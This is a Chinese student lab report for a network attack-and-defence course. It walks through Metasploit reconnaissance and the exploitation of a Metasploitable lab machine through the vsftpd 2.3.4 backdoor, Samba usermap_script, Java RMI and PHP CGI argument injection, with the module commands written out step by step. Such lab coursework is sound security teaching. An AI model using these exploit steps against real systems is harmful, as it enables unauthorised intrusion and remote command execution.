20222406 2024-2025-1 《网络与系统攻防技术》实验六实验报告

20222406 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

  • 前期渗透:在 root 权限下进行主机发现、端口扫描、扫系统版本和漏洞操作。
  • 多种漏洞利用:包括 Vsftpd 源码包后门漏洞(21 端口)、SambaMS - RPC Shell 命令注入漏洞(139 端口)、Java RMI SERVER 命令执行漏洞(1099 端口)、PHP CGI 参数执行注入漏洞(80 端口)。

2.实验过程

首先从官网下载靶机,其中用户名和密码都是msfadmin

2.1 前期渗透

2.1.1 主机发现


我的靶机IP为192.168.137.146,此处需要进入root权限下,否则后续可能失败。

我的虚拟机IP为192.168.137.128
随后依次输入命令msfconsolesearch arp_sweepuse 0set RHOSTS 192.168.137.0/24set THREADS 50run

从[+]的第三个可以发现靶机。

2.1.2 端口扫描

输入search portscan/tcpuse 0set ROHSTS 192.168.137.146run

成功扫描出了开放的tcp端口。

2.1.3 扫系统版本、漏洞

输入search auxiliary/scanner/smb/smb_versionuse 0set RHOSTS 192.168.137.146run

目标主机运行的是Samba 3.0.20-Debian,且使用SMB Detected (versions:1),可能存在一些已知漏洞。

2.2 Vsftpd源码包后门漏洞(21端口)

漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

输入msfconsolesearch exploit/unix/ftp/vsftpd_234_backdooruse 0set RHOST 192.168.137.146run

输入uname –apwdid验证:

2.3 SambaMS-RPC Shell命令注入漏洞(端口139)

漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

输入msfconsolesearch exploit/multi/samba/usermap_scriptuse 0set RHOST 192.168.137.146exploit

输入uname–a验证:

2.4 Java RMI SERVER命令执行漏洞(1099端口)

漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。

参考2.1.2查看端口是否开放:

发现1099开放后输入search exploit/multi/misc/java_rmi_serveruse 0show optionsset RHOST 192.168.137.146exploit

输入sessions -i 1进入任务,再输入shell,利用whoami命令验证,得到结果root:

2.5 PHP CGI参数执行注入漏洞(80端口)

漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

输入search exploit/multi/http/php_cgi_arg_injectionuse 0set RHOST 192.168.137.146exploit

输入dir验证:

3.问题及解决方案

  • 问题1:在进行端口扫描时有时候无法正确执行
  • 问题1解决方案:在确保使用root权限后可以在kali中新开一个端口

4.学习感悟、思考等

通过本次《网络与系统攻防技术》实验,我收获颇丰。实验过程中亲身体验了从前期渗透到利用多种漏洞攻击靶机的完整流程,深刻认识到网络安全的复杂性和重要性。各个漏洞的原理和利用方式让我明白,即使看似平常的服务和端口都可能隐藏巨大风险,如 Vsftpd 源码包后门漏洞、Samba 等相关漏洞。同时,实验中遇到端口扫描问题也让我意识到权限管理在网络操作中的关键作用。这次实验不仅提高了我的实践操作能力,更让我对网络攻防有了新的理解,也提醒我在网络环境中需要时刻保持警惕,注重安全防护,进一步激发了我深入学习网络安全知识的热情。

posted @ 2024-11-16 19:39  20222406王瑞  阅读(16)  评论(0编辑  收藏  举报